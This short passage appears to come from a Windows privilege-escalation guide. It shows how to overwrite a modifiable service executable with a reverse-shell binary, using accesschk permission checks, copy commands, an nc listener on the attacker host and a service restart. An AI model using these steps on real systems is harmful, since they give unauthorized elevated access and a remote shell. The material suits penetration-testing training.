If the original service executables is `modifiable` by our user, we can simply replace it with our reverse shell executable. Remember to create a backup of the original executable if you are exploiting this in a real system ```bash Example scenario # winpeas output says a service executable (filepermservice.exe) is modifiable # verifies with accesschk .\accesschk.exe /accepteula -uvqw "C:\Program Files\File Permissions Service\filepermservice.exe" # check stop/start service permissions .\accesschk.exe /accepteula -uvqc filepermsvc # backup the original copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp # copy our reverse shell and overwrite the original service executable copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" # set up a listener in atttacker host rlwrap nc -lvnp 443 # start the service net start filepermservice.exe ```